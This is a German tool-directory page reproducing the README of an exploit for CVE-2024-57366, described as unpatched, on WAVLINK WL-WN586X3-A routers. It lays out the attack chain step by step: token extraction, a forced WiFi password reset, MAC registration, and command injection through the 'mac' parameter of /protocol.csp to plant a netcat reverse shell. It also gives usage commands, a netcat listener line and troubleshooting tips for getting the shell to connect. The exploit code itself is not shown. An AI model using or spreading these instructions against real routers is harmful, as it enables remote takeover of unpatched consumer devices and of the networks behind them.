Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-57366 — Productized exploit for CVE-2024-57366 on WAVLINK WL-WN586X3-A routers (UNPATCHED AS OF THIS RELEASE!) | Kitploit
Tools/GitHubGitHub/h4ckusaur/cve-2024-57366
IoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationWireless SecurityPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubh4ckusaur/cve-2024-57366

CVE-2024-57366

Productized exploit for CVE-2024-57366 on WAVLINK WL-WN586X3-A routers (UNPATCHED AS OF THIS RELEASE!)

vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2024-57366 Exploit

Ein robuster Exploit für CVE-2024-57366, der Remote-Codeausführung auf verwundbaren Routern durch Umgehung der MAC-Adressvalidierung und Befehlseinschleusung ermöglicht.

Dies ist ein Post-Autorisierungs-Exploit, der erfordert, dass die „Fernsteuerung“-Funktion des Routers aktiviert ist und das Administratorkennwort vorhanden ist. Der Administrator-Benutzername ist als „admin“ fest codiert.

🚀 Funktionen

  • Automatische MAC-Adressregistrierung – Stellt eine WLAN-Verbindung her, um die MAC-Adresse beim Router zu registrieren
  • Netzwerkerhaltender Exploit – Behält Ihre bestehenden Netzwerkverbindungen während des Exploits bei
  • MAC-Adress-Caching – Schnelle wiederholte Exploits mithilfe zwischengespeicherter erfolgreicher MAC-Adressen
  • BurpSuite-kompatibel – Entspricht exakt dem Anfrageformat für maximale Zuverlässigkeit
  • Timeout-Behandlung – Hilfreiche Meldungen, wenn Reverse-Shell-Verbindungen erwartet werden
  • Benutzerfreundlich – Einfacher textbasierter MAC-Adress-Cache für einfache Verwaltung

📋 Voraussetzungen

  • Python 3.6+
  • Linux-System mit WLAN-Adapter
  • sudo-Zugriff (erforderlich für die Verwaltung von Netzwerkschnittstellen)
  • Zielrouter verwundbar für CVE-2024-57366

🛠️ Installation

  1. Klonen oder laden Sie die Exploit-Dateien herunter
  2. Stellen Sie sicher, dass die erforderlichen Python-Pakete installiert sind:
    root@kitploit:~
    pip3 install requests
    

🎯 Verwendung

Basis-Exploit (Erstmalig)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

Schnell-Exploit (Mit zwischengespeicherter MAC)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Das Skript fragt: „Use cached MAC for quick exploit? (y/n):“ – antworten Sie mit „y“

Vollständigen Exploit erzwingen (Cache überspringen)

root@kitploit:~
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full

Zwischengespeicherte MAC-Adressen auflisten

root@kitploit:~
python3 exploit.py --list-cached

📖 Befehlszeilenoptionen

  • --target – IP-Adresse des Zielrouters (Standard: 127.0.0.1)
  • --port – Port des Zielrouters (Standard: 80)
  • --local-ip – Ihre lokale IP-Adresse für den Reverse-Shell-Rückruf
  • --local-port – Lokaler Port für den Reverse-Shell-Rückruf (Standard: 4444)
  • --password – Router-Administratorkennwort
  • --ssid – WLAN-Netzwerkname (Standard: WAVLINK-Mesh_DC4B)
  • --force-full – Vollständigen Exploit erzwingen, Cache-Prüfung überspringen
  • --list-cached – Zwischengespeicherte MAC-Adressen auflisten und beenden

🔧 Funktionsweise

Technischer Überblick

CVE-2024-57366 nutzt eine Umgehung der MAC-Adressvalidierung in der Router-Firmware aus. Die Schwachstelle ermöglicht eine Befehlseinschleusung über den Parameter mac im Endpunkt /protocol.csp.

Exploit-Ablauf

  1. Authentifizierung – Extrahiert Authentifizierungstoken vom Router
  2. WLAN-Kennwort zurücksetzen – Setzt das WLAN-Kennwort des Routers auf das Administratorkennwort zurück
  3. MAC-Registrierung – Stellt eine WLAN-Verbindung her, um die MAC-Adresse beim Router zu registrieren
  4. Befehlseinschleusung – Injiziert die Reverse-Shell-Nutzlast mithilfe der registrierten MAC
  5. Netzwerkerhaltung – Behält bestehende Netzwerkverbindungen während des gesamten Vorgangs bei

Wichtige technische Details

  • Umgehung der MAC-Validierung: Der Router validiert MAC-Adressen, indem er prüft, ob sie eine WLAN-Verbindung hergestellt haben
  • Netzwerkschnittstellenbindung: Verwendet die Schnittstelle eth0, um den ursprünglichen Netzwerkkontext zu erhalten
  • Anfrageformat: Entspricht genau dem BurpSuite-Format (index=1, Token im URL-Pfad)
  • Nutzlast: Netcat-Reverse-Shell mit benannter Pipe für Zuverlässigkeit

MAC-Adress-Caching

Der Exploit speichert erfolgreiche MAC-Adressen automatisch in successful_macs.txt:

root@kitploit:~
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here

32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08

Manuelles Hinzufügen einer MAC: Bearbeiten Sie successful_macs.txt und fügen Sie Zeilen wie diese hinzu:

root@kitploit:~
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08

🎯 Beispielverwendung

Erster Exploit-Versuch

root@kitploit:~
# Netcat-Listener starten
nc -lvp 4444

# Exploit ausführen
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123

# Wenn gefragt wird, ob die MAC-Adresse gespeichert werden soll, antworten Sie mit „y“

Nachfolgende Exploits (viel schneller)

root@kitploit:~
# Netcat-Listener starten
nc -lvp 4444

# Exploit ausführen (verwendet zwischengespeicherte MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Antworten Sie mit „y“, wenn gefragt wird, ob die zwischengespeicherte MAC verwendet werden soll

🔍 Fehlerbehebung

Häufige Probleme

  1. „No wireless adapters found“

    • Stellen Sie sicher, dass ein WLAN-Adapter aktiviert ist
    • Überprüfen Sie, ob WLAN eingeschaltet ist
    • Versuchen Sie, das Skript mit sudo auszuführen
  2. „MAC address validation failed“

    • Die MAC-Adresse muss beim Router registriert sein
    • Stellen Sie sicher, dass der WLAN-Verbindungsschritt erfolgreich abgeschlossen wurde
    • Versuchen Sie, zuerst manuell eine WLAN-Verbindung herzustellen
  3. „Request timed out“ – Das könnte tatsächlich bedeuten, dass der Exploit funktioniert hat! – Überprüfen Sie Ihren Netcat-Listener auf eine Reverse-Shell-Verbindung – Der Router führt möglicherweise den Befehl aus, antwortet aber nicht auf HTTP

  4. „Reverse shell not connecting“ – Überprüfen Sie, ob Ihre --local-ip korrekt ist (verwenden Sie ip addr show eth0) – Stellen Sie sicher, dass keine Firewall die Verbindung blockiert – Überprüfen Sie, ob der Netcat-Listener auf dem richtigen Port läuft

Netzwerkanforderungen

  • Schnittstelle eth0: Muss eine IP-Adresse für die Netzwerkerhaltung haben
  • WLAN-Adapter: Erforderlich für die anfängliche MAC-Registrierung
  • Routerzugriff: Der Router muss über die Schnittstelle eth0 erreichbar sein

📁 Dateistruktur

root@kitploit:~
CVE-2024-57366/
├── exploit.py              # Haupt-Exploit-Skript
├── successful_macs.txt     # MAC-Adress-Cache (automatisch erstellt)
└── README.md               # Diese Datei

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungszwecken und autorisierten Tests. Verwenden Sie es nur auf Systemen, die Sie besitzen oder für die Sie ausdrückliche Erlaubnis zum Testen haben. Die Autoren sind nicht verantwortlich für die missbräuchliche Verwendung dieses Tools.

🔗 Referenzen

  • CVE-2024-57366
  • Router-Firmware-Schwachstelle in der MAC-Adressvalidierung
  • Befehlseinschleusung über den Endpunkt /protocol.csp

📝 Lizenz

Dieses Projekt wird wie besehen zu Bildungszwecken bereitgestellt. Verwenden Sie es verantwortungsvoll und in Übereinstimmung mit den geltenden Gesetzen und Vorschriften.

Tool herunterladen